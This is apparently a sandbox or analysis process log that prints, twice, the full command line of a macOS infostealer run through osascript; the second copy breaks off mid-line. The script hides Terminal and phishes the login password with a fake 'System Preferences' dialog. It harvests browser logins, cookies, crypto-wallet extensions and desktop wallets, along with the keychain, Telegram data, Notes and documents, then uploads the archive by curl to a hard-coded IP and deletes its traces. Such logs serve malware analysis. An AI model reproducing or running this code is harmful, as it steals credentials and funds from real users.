\"ibnejdfjmmkpcnlpebklmnkoeoihofec\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\", \"kncchdigobghenbbaddojjnnaogfppfj\", \"efbglgofoippbgcjepnhiblaibcnclgk\", \"mcbigmjiafegjnnogedioegffbooigli\", \"fccgmnglbhajioalokbcidhcaikhlcpm\", \"hnhobjmcibchnmglfbldbfabcgaknlkj\", \"apnehcjmnengpnmccpaibjmhhoadaico\", \"enabgbdfcbaehmbigakijjabdpdnimlg\", \"mgffkfbidihjpoaomajlbgchddlicgpn\", \"fopmedgnkfpebgllppeddmmochcookhc\", \"jojhfeoedkpkglbfimdfabpdfjaoolaf\", \"ammjlinfekkoockogfhdkgcohjlbhmff\", \"abkahkcbhngaebpcgfmhkoioedceoigp\", \"dcbjpgbkjoomeenajdabiicabjljlnfp\", \"gkeelndblnomfmjnophbhfhcjbcnemka\", \"pnndplcbkakcplkjnolgbkdgjikjednm\", \"copjnifcecdedocejpaapepagaodgpbh\", \"hgbeiipamcgbdjhfflifkgehomnmglgk\", \"mkchoaaiifodcflmbaphdgeidocajadp\", \"ellkdbaphhldpeajbepobaecooaoafpg\", \"mdnaglckomeedfbogeajfajofmfgpoae\", \"nknhiehlklippafakaeklbeglecifhad\", \"ckklhkaabbmdjkahiaaplikpdddkenic\", \"fmblappgoiilbgafhjklehhfifbdocee\", \"nphplpgoakhhjchkkhmiggakijnkhfnd\", \"cnmamaachppnkjgnildpdmkaakejnhae\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\", \"niiaamnmgebpeejeemoifgdndgeaekhe\", \"odpnjmimokcmjgojhnhfcnalnegdjmdn\", \"lbjapbcmmceacocpimbpbidpgmlmoaao\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\", \"hpglfhgfnhbgpjdenjgmdgoeiappafln\", \"egjidjbpglichdcondbcbdnbeeppgdph\", \"ibljocddagjghmlpgihahamcghfggcjc\", \"gkodhkbmiflnmkipcmlhhgadebbeijhh\", \"dbgnhckhnppddckangcjbkjnlddbjkna\", \"mfhbebgoclkghebffdldpobeajmbecfk\", \"nlbmnnijcnlegkjjpcfjclmcfggfefdm\", \"nlgbhdfgdhgbiamfdfmbikcdghidoadd\", \"acmacodkjbdgmoleebolmdjonilkdbch\", \"agoakfejjabomempkjlepdflaleeobhb\", \"dgiehkgfknklegdhekgeabnhgfjhbajd\", \"onhogfjeacnfoofkfgppdlbmlmnplgbn\", \"kkpehldckknjffeakihjajcjccmcjflh\", \"jaooiolkmfcmloonphpiiogkfckgciom\", \"ojggmchlghnjlapmfbnjholfjkiidbch\", \"pmmnimefaichbcnbndcfpaagbepnjaig\", \"oiohdnannmknmdlddkdejbmplhbdcbee\", \"aiifbnbfobpmeekipheeijimdpnlpgpp\", \"aholpfdialjgjfhomihkjbmgjidlcdno\", \"anokgmphncpekkhclmingpimjmcooifb\", \"kkpllkodjeloidieedojogacfhpaihoh\", \"iokeahhehimjnekafflcihljlcjccdbe\", \"ifckdpamphokdglkkdomedpdegcjhjdp\", \"loinekcabhlmhjjbocijdoimmejangoa\", \"fcfcfllfndlomdhbehjjcoimbgofdncg\", \"ifclboecfhkjbpmhgehodcjpciihhmif\", \"dmkamcknogkgcdfhhbddcghachkejeap\", \"ookjlbkiijinhpmnjffcofjonbfbgaoc\", \"oafedfoadhdjjcipmcbecikgokpaphjk\", \"mapbhaebnddapnmifbbkgeedkeplgjmf\", \"cmndjbecilbocjfkibfbifhngkdmjgog\", \"kpfopkelmapcoipemfendmdcghnegimn\", \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \"ppbibelpcjmhbdihakflkdcoccbgbkpo\", \"ffnbelfdoeiohenkjibnmadjiehjhajb\", \"opcgpfmipidbgpenhmajoajpbobppdil\", \"lakggbcodlaclcbbbepmkpdhbcomcgkd\", \"kgdijkcfiglijhaglibaidbipiejjfdp\", \"hdkobeeifhdplocklknbnejdelgagbao\", \"lnnnmfcpbkafcpgdilckhmhbkkbpkmid\", \"nbdhibgjnjpnkajaghbffjbkcgljfgdi\", \"kmhcihpebfmpgmihbkipmjlmmioameka\", \"kmphdnilpmdejikjdnlbcnmnabepfgkh\", \"nngceckbapebfimnlniiiahkandclblb\"} set chromiumFiles to {\"/Network/Cookies\", \"/Cookies\", \"/Web Data\", \"/Login Data\", \"/Local Extension Settings/\", \"/IndexedDB/\"} repeat with chromium in chromium_map set savePath to writemind & \"Chromium/\" & item 1 of chromium & \"_\" try set fileList to list folder item 2 of chromium without invisibles repeat with currentItem in fileList if ((currentItem as string) is equal to \"Default\") or ((currentItem as string) contains \"Profile\") then repeat with CFile in chromiumFiles set readpath to (item 2 of chromium & currentItem & CFile) if ((CFile as string) is equal to \"/Network/Cookies\") then set CFile to \"/Cookies\" end if if ((CFile as string) is equal to \"/Local Extension Settings/\") then grabPlugins(readpath, savePath & currentItem, pluginList, false) else if (CFile as string) is equal to \"/IndexedDB/\" then grabPlugins(readpath, savePath & currentItem, pluginList, true) else set writepath to savePath & currentItem & CFile readwrite(readpath, writepath) end if end repeat end if end repeat end try end repeat end chromium on telegram(writemind, library) try GrabFolder(library & \"Telegram Desktop/tdata/\", writemind & \"Telegram Data/\") end try end telegram on deskwallets(writemind, deskwals) repeat with deskwal in deskwals try GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal) end try end repeat end deskwallets on filegrabber(writemind) try set destinationFolderPath to POSIX file (writemind & \"FileGrabber/\") mkdir(destinationFolderPath) set photosPath to POSIX file (writemind & \"FileGrabber/NotesFiles/\") mkdir(photosPath) set extensionsList to {\"txt\", \"pdf\", \"docx\", \"wallet\", \"key\", \"keys\", \"doc\"} set bankSize to 0 tell application \"Finder\" try set safariFolderPath to (path to home folder as text) & \"Library:Cookies:\" duplicate file (safariFolderPath & \"Cookies.binarycookies\") to folder destinationFolderPath with replacing set name of result to \"saf1\" end try try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" set notesAccounts to folder (notesFolderPath & \"Accounts:LocalAccount:Media\") duplicate notesAccounts to photosPath with replacing duplicate notesAccounts to POSIX file photosPath as alias with replacing set notesFolder to folder notesFolderPath set notesFiles to {\"NoteStore.sqlite\", \"NoteStore.sqlite-shm\", \"NoteStore.sqlite-wal\"} repeat with fileName in notesFiles set sourceFile to file fileName of notesFolder duplicate sourceFile to POSIX file destinationFolderPath as alias with replacing end repeat end try try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set downloadsFiles to every file of folder \"Downloads\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set filesize to size of aFile if filesize < 3 * 1024 * 1024 then if (bankSize + filesize) < 30 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + filesize end try else exit repeat end if end if end if end repeat end try end tell end try end filegrabber on send_data(attempt) try set result_send to (do shell script \"curl -X POST -H \\\"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\\\" -H \\\"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\\\" -H \\\"cl: 0\\\" -H \\\"cn: 0\\\" --max-time 300 -retry 5 -retry-delay 10 -F \\\"file=@/tmp/out.zip\\\" http://141.98.9.20/joinsystem\") on error if attempt < 40 then delay 3 send_data(attempt + 1) end if end try end send_data set username to (system attribute \"USER\") set profile to \"/Users/\" & username set randomNumber to do shell script \"echo \$((RANDOM % 9000 + 1000))\" set writemind to \"/tmp/\" & randomNumber & \"/\" try set result to (do shell script \"system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType\") writeText(result, writemind & \"info\") end try set library to profile & \"/Library/Application Support/\" set password_entered to getpwd(username, writemind) delay 0.01 set chromiumMap to {{\"Chrome\", library & \"Google/Chrome/\"}, {\"Brave\", library & \"BraveSoftware/Brave-Browser/\"}, {\"Edge\", library & \"Microsoft Edge/\"}, {\"Vivaldi\", library & \"Vivaldi/\"}, {\"Opera\", library & \"com.operasoftware.Opera/\"}, {\"OperaGX\", library & \"com.operasoftware.OperaGX/\"}, {\"Chrome Beta\", library & \"Google/Chrome Beta/\"}, {\"Chrome Canary\", library & \"Google/Chrome Canary\"}, {\"Chromium\", library & \"Chromium/\"}, {\"Chrome Dev\", library & \"Google/Chrome Dev/\"}, {\"Arc\", library & \"Arc/\"}, {\"Coccoc\", library & \"Coccoc/\"}} set walletMap to {{\"deskwallets/Electrum\", profile & \"/.electrum/wallets/\"}, {\"deskwallets/Coinomi\", library & \"Coinomi/wallets/\"}, {\"deskwallets/Exodus\", library & \"Exodus/\"}, {\"deskwallets/Atomic\", library & \"atomic/Local Storage/leveldb/\"}, {\"deskwallets/Wasabi\", profile & \"/.walletwasabi/client/Wallets/\"}, {\"deskwallets/Ledger_Live\", library & \"Ledger Live/\"}, {\"deskwallets/Monero\", profile & \"/Monero/wallets/\"}, {\"deskwallets/Bitcoin_Core\", library & \"Bitcoin/wallets/\"}, {\"deskwallets/Litecoin_Core\", library & \"Litecoin/wallets/\"}, {\"deskwallets/Dash_Core\", library & \"DashCore/wallets/\"}, {\"deskwallets/Electrum_LTC\", profile & \"/.electrum-ltc/wallets/\"}, {\"deskwallets/Electron_Cash\", profile & \"/.electron-cash/wallets/\"}, {\"deskwallets/Guarda\", library & \"Guarda/\"}, {\"deskwallets/Dogecoin_Core\", library & \"Dogecoin/wallets/\"}, {\"deskwallets/Trezor_Suite\", library & \"@trezor/suite-desktop/\"}} readwrite(library & \"Binance/app-store.json\", writemind & \"deskwallets/Binance/app-store.json\") readwrite(library & \"@tonkeeper/desktop/config.json\", \"deskwallets/TonKeeper/config.json\") readwrite(profile & \"/Library/Keychains/login.keychain-db\", writemind & \"keychain\") if release then readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\", writemind & \"FileGrabber/NoteStore.sqlite\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal\", writemind & \"FileGrabber/NoteStore.sqlite-wal\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm\", writemind & \"FileGrabber/NoteStore.sqlite-shm\") readwrite2(profile & \"/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/Cookies.binarycookies\") readwrite(profile & \"/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/saf1\") end if if filegrabbers then filegrabber(writemind) end if writeText(username, writemind & \"username\") set ff_paths to {library & \"Firefox/Profiles/\", library & \"Waterfox/Profiles/\", library & \"Pale Moon/Profiles/\"} repeat with firefox in ff_paths try parseFF(firefox, writemind) end try end repeat chromium(writemind, chromiumMap) deskwallets(writemind, walletMap) telegram(writemind, library) do shell script \"ditto -c -k --sequesterRsrc \" & writemind & \" /tmp/out.zip\" send_data(0) do shell script \"rm -r \" & writemind do shell script \"rm /tmp/out.zip\" '&"
1⤵
PID:528
- /usr/bin/osascript
  osascript -e "set release to true set filegrabbers to true if release then try tell window 1 of application \"Terminal\" to set visible to false end try end if on filesizer(paths) set fsz to 0 try set theItem to quoted form of POSIX path of paths set fsz to (do shell script \"/usr/bin/mdls -name kMDItemFSSize -raw \" & theItem) end try return fsz end filesizer on mkdir(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) do shell script \"mkdir -p \" & filePosixPath end try end mkdir on FileName(filePath) try set reversedPath to (reverse of every character of filePath) as string set trimmedPath to text 1 thru ((offset of \"/\" in reversedPath) - 1) of reversedPath set finalPath to (reverse of every character of trimmedPath) as string return finalPath end try end FileName on BeforeFileName(filePath) try set lastSlash to offset of \"/\" in (reverse of every character of filePath) as string set trimmedPath to text 1 thru -(lastSlash + 1) of filePath return trimmedPath end try end BeforeFileName on writeText(textToWrite, filePath) try set folderPath to BeforeFileName(filePath) mkdir(folderPath) set fileRef to (open for access filePath with write permission) write textToWrite to fileRef starting at eof close access fileRef end try end writeText on readwrite(path_to_file, path_as_save) try set fileContent to read path_to_file set folderPath to BeforeFileName(path_as_save) mkdir(folderPath) do shell script \"cat \" & quoted form of path_to_file & \" > \" & quoted form of path_as_save end try end readwrite on readwrite2(path_to_file, path_as_save) try set folderPath to do shell script \"dirname \" & quoted form of path_as_save mkdir(folderPath) tell application \"Finder\" set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacing end tell end try end readwrite2 on isDirectory(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) set fileType to (do shell script \"file -b \" & filePosixPath) if fileType ends with \"directory\" then return true end if return false end try end isDirectory on GrabFolderLimit(sourceFolder, destinationFolder) try set bankSize to 0 set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolderLimit(itemPath, savePath) else set fsz to filesizer(itemPath) set bankSize to bankSize + fsz if bankSize < 10 * 1024 * 1024 then readwrite(itemPath, savePath) end if end if end if end repeat end try end GrabFolderLimit on GrabFolder(sourceFolder, destinationFolder) try set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\", \"dumps\", \"emoji\", \"user_data\", \"__update__\", \"user_data#2\", \"user_data#3\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolder(itemPath, savePath) else readwrite(itemPath, savePath) end if end if end repeat end try end GrabFolder on parseFF(firefox, writemind) try set myFiles to {\"/cookies.sqlite\", \"/formhistory.sqlite\", \"/key4.db\", \"/logins.json\"} set fileList to list folder firefox without invisibles repeat with currentItem in fileList set fpath to writemind & \"ff/\" & currentItem set readpath to firefox & currentItem repeat with FFile in myFiles readwrite(readpath & FFile, fpath & FFile) end repeat end repeat end try end parseFF on checkvalid(username, password_entered) try set result to do shell script \"dscl . authonly \" & quoted form of username & space & quoted form of password_entered if result is not equal to \"\" then return false else return true end if on error return false end try end checkvalid on getpwd(username, writemind) try if checkvalid(username, \"\") then set result to do shell script \"security 2>&1 > /dev/null find-generic-password -ga \\\"Chrome\\\" | awk \\\"{print \$2}\\\"\" writeText(result as string, writemind & \"masterpass-chrome\") else repeat set result to display dialog \"Required Application Helper.\\nPlease enter password for continue.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"System Preferences\" with hidden answer set password_entered to text returned of result if checkvalid(username, password_entered) then writeText(password_entered, writemind & \"pwd\") return password_entered end if end repeat end if end try return \"\" end getpwd on grabPlugins(paths, savePath, pluginList, index) try set fileList to list folder paths without invisibles repeat with PFile in fileList repeat with Plugin in pluginList if (PFile contains Plugin) then set newpath to paths & PFile set newsavepath to savePath & \"/\" & Plugin if index then set newsavepath to newsavepath & \"/IndexedDB/\" end if GrabFolder(newpath, newsavepath) end if end repeat end repeat end try end grabPlugins on chromium(writemind, chromium_map) set pluginList to {\"keenhcnmdmjjhincpilijphpiohdppno\", \"hbbgbephgojikajhfbomhlmmollphcad\", \"cjmkndjhnagcfbpiemnkdpomccnjblmj\", \"dhgnlgphgchebgoemcjekedjjbifijid\", \"hifafgmccdpekplomjjkcfgodnhcellj\", \"kamfleanhcmjelnhaeljonilnmjpkcjc\", \"jnldfbidonfeldmalbflbmlebbipcnle\", \"fdcnegogpncmfejlfnffnofpngdiejii\", \"klnaejjgbibmhlephnhpmaofohgkpgkd\", \"pdadjkfkgcafgbceimcpbkalnfnepbnk\", \"kjjebdkfeagdoogagbhepmbimaphnfln\", \"ldinpeekobnhjjdofggfgjlcehhmanlj\", \"dkdedlpgdmmkkfjabffeganieamfklkm\", \"bcopgchhojmggmffilplmbdicgaihlkp\", \"kpfchfdkjhcoekhdldggegebfakaaiog\", \"idnnbdplmphpflfnlkomgpfbpcgelopg\", \"mlhakagmgkmonhdonhkpjeebfphligng\", \"bipdhagncpgaccgdbddmbpcabgjikfkn\", \"gcbjmdjijjpffkpbgdkaojpmaninaion\", \"nhnkbkgjikgcigadomkphalanndcapjk\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\", \"hoighigmnhgkkdaenafgnefkcmipfjon\", \"klghhnkeealcohjjanjjdaeeggmfmlpl\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\", \"fhbohimaelbohpjbbldcngcnapndodjp\", \"ebfidpplhabeedpnhjnobghokpiioolj\", \"emeeapjkbcbpbpgaagfchmcgglmebnen\", \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \"penjlddjkjgpnkllboccdgccekpkcbin\", \"fhilaheimglignddkjgofkcbgekhenbh\", \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\", \"cihmoadaighcejopammfbmddcmdekcje\", \"lodccjjbdhfakaekdiahmedfbieldgik\", \"omaabbefbmiijedngplfjmnooppbclkk\", \"cjelfplplebdjjenllpjcblmjkfcffne\", \"jnlgamecbpmbajjfhmmmlhejkemejdma\", \"fpkhgmpbidmiogeglndfbkegfdlnajnf\", \"bifidjkcdpgfnlbcjpdkdcnbiooooblg\", \"amkmjjmmflddogmhpjloimipbofnfjih\", \"flpiciilemghbmfalicajoolhkkenfel\", \"hcflpincpppdclinealmandijcmnkbgn\", \"aeachknmefphepccionboohckonoeemg\", \"nlobpakggmbcgdbpjpnagmdbdhdhgphk\", \"momakdpclmaphlamgjcndbgfckjfpemp\", \"mnfifefkajgofkcjkemidiaecocnkjeh\", \"fnnegphlobjdpkhecapkijjdkgcjhkib\", \"ehjiblpccbknkgimiflboggcffmpphhp\", \"ilhaljfiglknggcoegeknjghdgampffk\", \"pgiaagfkgcbnmiiolekcfmljdagdhlcm\", \"fnjhmkhhmkbjkkabndcnnogagogbneec\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \"imlcamfeniaidioeflifonfjeeppblda\", \"mdjmfdffdcmnoblignmgpommbefadffd\", \"ooiepdgjjnhcmlaobfinbomgebfgablh\", \"pcndjhkinnkaohffealmlmhaepkpmgkb\", \"ppdadbejkmjnefldpcdjhnkpbjkikoip\", \"cgeeodpfagjceefieflmdfphplkenlfk\", \"dlcobpjiigpikoobohmabehhmhfoodbb\", \"jiidiaalihmmhddjgbnbgdfflelocpak\", \"bocpokimicclpaiekenaeelehdjllofo\", \"pocmplpaccanhmnllbbkpgfliimjljgo\", \"cphhlgmgameodnhkjdmkpanlelnlohao\", \"mcohilncbfahbmgdjkbpemcciiolgcge\", \"bopcbmipnjdcdfflfgjdgdjejmgpoaab\", \"khpkpbbcccdmmclmpigdgddabeilkdpd\", \"ejjladinnckdgjemekebdpeokbikhfci\", \"phkbamefinggmakgklpkljjmgibohnba\", \"epapihdplajcdnnkdeiahlgigofloibg\", \"hpclkefagolihohboafpheddmmgdffjm\", \"cjookpbkjnpkmknedggeecikaponcalb\", \"cpmkedoipcpimgecpmgpldfpohjplkpp\", \"modjfdjcodmehnpccdjngmdfajggaoeh\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\", \"kncchdigobghenbbaddojjnnaogfppfj\", \"efbglgofoippbgcjepnhiblaibcnclgk\", \"mcbigmjiafegjnnogedioegffbooigli\", \"fccgmnglbhajioalokbcidhcaikhlcpm\", \"hnhobjmcibchnmglfbldbfabcgaknlkj\", \"apnehcjmnengpnmccpaibjmhhoadaico\", \"enabgbdfcbaehmbigakijjabdpdnimlg\", \"mgffkfbidihjpoaomajlbgchddlicgpn\", \"fopmedgnkfpebgllppeddmmochcookhc\", \"jojhfeoedkpkglbfimdfabpdfjaoolaf\", \"ammjlinfekkoockogfhdkgcohjlbhmff\", \"abkahkcbhngaebpcgfmhkoioedceoigp\", \"dcbjpgbkjoomeenajdabiicabjljlnfp\", \"gkeelndblnomfmjnophbhfhcjbcnemka\", \"pnndplcbkakcplkjnolgbkdgjikjednm\", \"copjnifcecdedocejpaapepagaodgpbh\", \"hgbeiipamcgbdjhfflifkgehomnmglgk\", \"mkchoaaiifodcflmbaphdgeidocajadp\", \"ellkdbaphhldpeajbepobaecooaoafpg\", \"mdnaglckomeedfbogeajfajofmfgpoae\", \"nknhiehlklippafakaeklbeglecifhad\", \"ckklhkaabbmdjkahiaaplikpdddkenic\", \"fmblappgoiilbgafhjklehhfifbdocee\", \"nphplpgoakhhjchkkhmiggakijnkhfnd\", \"cnmamaachppnkjgnildpdmkaakejnhae\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\", \"niiaamnmgebpeejeemoifgdndgeaekhe\", \"odpnjmimokcmjgojhnhfcnalnegdjmdn\", \"lbjapbcmmceacocpimbpbidpgmlmoaao\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\", \"hpglfhgfnhbgpjdenjgmdgoeiappafln\", \"egjidjbpglichdcondbcbdnbeeppgdph\", \"ibljocddagjghmlpgihahamcghfggcjc\", \"gkodhkbmiflnmkipcmlhhgadebbeijhh\", \"dbgnhckhnppddckangcjbkjnlddbjkna\", \"mfhbebgoclkghebffdldpobeajmbecfk\", \"nlbmnnijcnlegkjjpcfjclmcfggfefdm\", \"nlgbhdfgdhgbiamfdfmbikcdghidoadd\", \"acmacodkjbdgmoleebolmdjonilkdbch\", \"agoakfejjabomempkjlepdflaleeobhb\", \"dgiehkgfknklegdhekgeabnhgfjhbajd\", \"onhogfjeacnfoofkfgppdlbmlmnplgbn\", \"kkpehldckknjffeakihjajcjccmcjflh\", \"jaooiolkmfcmloonphpiiogkfckgciom\", \"ojggmchlghnjlapmfbnjholfjkiidbch\", \"pmmnimefaichbcnbndcfpaagbepnjaig\", \"oiohdnannmknmdlddkdejbmplhbdcbee\", \"aiifbnbfobpmeekipheeijimdpnlpgpp\", \"aholpfdialjgjfhomihkjbmgjidlcdno\", \"anokgmphncpekkhclmingpimjmcooifb\", \"kkpllkodjeloidieedojogacfhpaihoh\", \"iokeahhehimjnekafflcihljlcjccdbe\", \"ifckdpamphokdglkkdomedpdegcjhjdp\", \"loinekcabhlmhjjbocijdoimmejangoa\", \"fcfcfllfndlomdhbehjjcoimbgofdncg\", \"ifclboecfhkjbpmhgehodcjpciihhmif\", \"dmkamcknogkgcdfhhbddcghachkejeap\", \"ookjlbkiijinhpmnjffcofjonbfbgaoc\", \"oafedfoadhdjjcipmcbecikgokpaphjk\", \"mapbhaebnddapnmifbbkgeedkeplgjmf\", \"cmndjbecilbocjfkibfbifhngkdmjgog\", \"kpfopkelmapcoipemfendmdcghnegimn\", \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \"ppbibelpcjmhbdihakflkdcoccbgbkpo\", \"ffnbelfdoeiohenkjibnmadjiehjhajb\", \"opcgpfmipidbgpenhmajoajpbobppdil\", \"lakggbcodlaclcbbbepmkpdhbcomcgkd\", \"kgdijkcfiglijhaglibaidbipiejjfdp\", \"hdkobeeifhdplocklknbnejdelgagbao\", \"lnnnmfcpbkafcpgdilckhmhbkkbpkmid\", \"nbdhibgjnjpnkajaghbffjbkcgljfgdi\", \"kmhcihpebfmpgmihbkipmjlmmioameka\", \"kmphdnilpmdejikjdnlbcnmnabepfgkh\", \"nngceckbapebfimnlniiiahkandclblb\"} set chromiumFiles to {\"/Network/Cookies\", \"/Cookies\", \"/Web Data\", \"/Login Data\", \"/Local Extension Settings/\", \"/IndexedDB/\"} repeat with chromium in chromium_map set savePath to writemind & \"Chromium/\" & item 1 of chromium & \"_\" try set fileList to list folder item 2 of chromium without invisibles repeat with currentItem in fileList if ((currentItem as string) is equal to \"Default\") or ((currentItem as string) contains \"Profile\") then repeat with CFile in chromiumFiles set readpath to (item 2 of chromium & currentItem & CFile) if ((CFile as string) is equal to \"/Network/Cookies\") then set CFile to \"/Cookies\" end if if ((CFile as string) is equal to \"/Local Extension Settings/\") then grabPlugins(readpath, savePath & currentItem, pluginList, false) else if (CFile as string) is equal to \"/IndexedDB/\" then grabPlugins(readpath, savePath & currentItem, pluginList, true) else set writepath to savePath & currentItem & CFile readwrite(readpath, writepath) end if end repeat end if end repeat end try end repeat end chromium on telegram(writemind, library) try GrabFolder(library & \"Telegram Desktop/tdata/\", writemind & \"Telegram Data/\") end try end telegram on deskwallets(writemind, deskwals) repeat with deskwal in deskwals try GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal) end try end repeat end deskwallets on filegrabber(writemind) try set destinationFolderPath to POSIX file (writemind & \"FileGrabber/\") mkdir(destinationFolderPath) set photosPath to POSIX file (writemind & \"FileGrabber/NotesFiles/\") mkdir(photosPath) set extensionsList to {\"txt\", \"pdf\", \"docx\", \"wallet\", \"key\", \"keys\", \"doc\"} set bankSize to 0 tell application \"Finder\" try set safariFolderPath to (path to home folder as text) & \"Library:Cookies:\" duplicate file (safariFolderPath & \"Cookies.binarycookies\") to folder destinationFolderPath with replacing set name of result to \"saf1\" end try try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" set notesAccounts to folder (notesFolderPath & \"Accounts:LocalAccount:Media\") duplicate notesAccounts to photosPath with replacing duplicate notesAccounts to POSIX file photosPath as alias with replacing set notesFolder to folder notesFolderPath set notesFiles to {\"NoteStore.sqlite\", \"NoteStore.sqlite-shm\", \"NoteStore.sqlite-wal\"} repeat with fileName in notesFiles set sourceFile to file fileName of notesFolder duplicate sourceFile to POSIX file destinationFolderPath as alias with replacing end repeat end try try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set downloadsFiles to every file of folder \"Downloads\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set filesize to size of aFile if filesize < 3 * 1024 * 1024 then if (bankSize + filesize) < 30 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + filesize end try else exit repeat end if end if end if end repeat end try end tell end try end filegrabber on send_data(attempt) try set result_send to (do shell script \"curl -X POST -H \\\"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\\\" -H \\\"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\\\" -H \\\"cl: 0\\\" -H \\\"cn: 0\\\" --max-time 300 -retry 5 -retry-delay 10 -F \\\"file=@/tmp/out.zip\\\" http://141.98.9.20/joinsystem\") on error if attempt < 40 then delay 3 send_data(attempt + 1) end if end try end send_data set username to (system attribute \"USER\") set profile to \"/Users/\" & username set randomNumber to do shell script \"echo \$((RANDOM % 9000 + 1000))\" set writemind to \"/tmp/\" & randomNumber & \"/\" try set result to (do shell script \"system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType\") writeText(result, writemind & \"info\") end try set library to profile & \"/Library/Application Support/\" set password_entered to getpwd(username, writemind) delay 0.01 set chromiumMap to {{\"Chrome\", library & \"Google/Chrome/\"}, {\"Brave\", library & \"BraveSoftware/Brave-Browser/\"}, {\"Edge\", library & \"Microsoft Edge/\"}, {\"Vivaldi\", library & \"Vivaldi/\"}, {\"Opera\", library & \"com.operasoftware.Opera/\"}, {\"OperaGX\", library & \"com.operasoftware.OperaGX/\"}, {\"Chrome Beta\", library & \"Google/Chrome Beta/\"}, {\"Chrome Canary\", library & \"Google/Chrome Canary\"}, {\"Chromium\", library & \"Chromium/\"}, {\"Chrome Dev\", library & \"Google/Chrome Dev/\"}, {\"Arc\", library & \"Arc/\"}, {\"Coccoc\", library & \"Coccoc/\"}} set walletMap to {{\"deskwallets/Electrum\", profile & \"/.electrum/wallets/\"}, {\"deskwallets/Coinomi\", library & \"Coinomi/wallets/\"}, {\"deskwallets/Exodus\", library & \"Exodus/\"}, {\"deskwallets/Atomic\", library & \"atomic/Local Storage/leveldb/\"}, {\"deskwallets/Wasabi\", profile & \"/.walletwasabi/client/Wallets/\"}, {\"deskwallets/Ledger_Live\", library & \"Ledger Live/\"}, {\"deskwallets/Monero\", profile & \"/Monero/wallets/\"}, {\"deskwallets/Bitcoin_Core\", library & \"Bitcoin/wallets/\"}, {\"deskwallets/Litecoin_Core\", library & \"Litecoin/wallets/\"}, {\"deskwallets/Dash_Core\", library & \"DashCore/wallets/\"}, {\"deskwallets/Electrum_LTC\", profile & \"/.electrum-ltc/wallets/\"}, {\"deskwallets/Electron_Cash\", profile & \"/.electron-cash/wallets/\"}, {\"deskwallets/Guarda\", library & \"Guarda/\"}, {\"deskwallets/Dogecoin_Core\", library & \"Dogecoin/wallets/\"}, {\"deskwallets/Trezor_Suite\", library & \"@trezor/suite-desktop/\"}} readwrite(library & \"Binance/app-store.json\", writemind & \"deskwallets/Binance/app-store.json\") readwrite(library & \"@tonkeeper/desktop/config.json\", \"deskwallets/TonKeeper/config.json\") readwrite(profile & \"/Library/Keychains/login.keychain-db\", writemind & \"keychain\") if release then readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\", writemind & \"FileGrabber/NoteStore.sqlite\") readwrite2(profile & \"/Library/Group 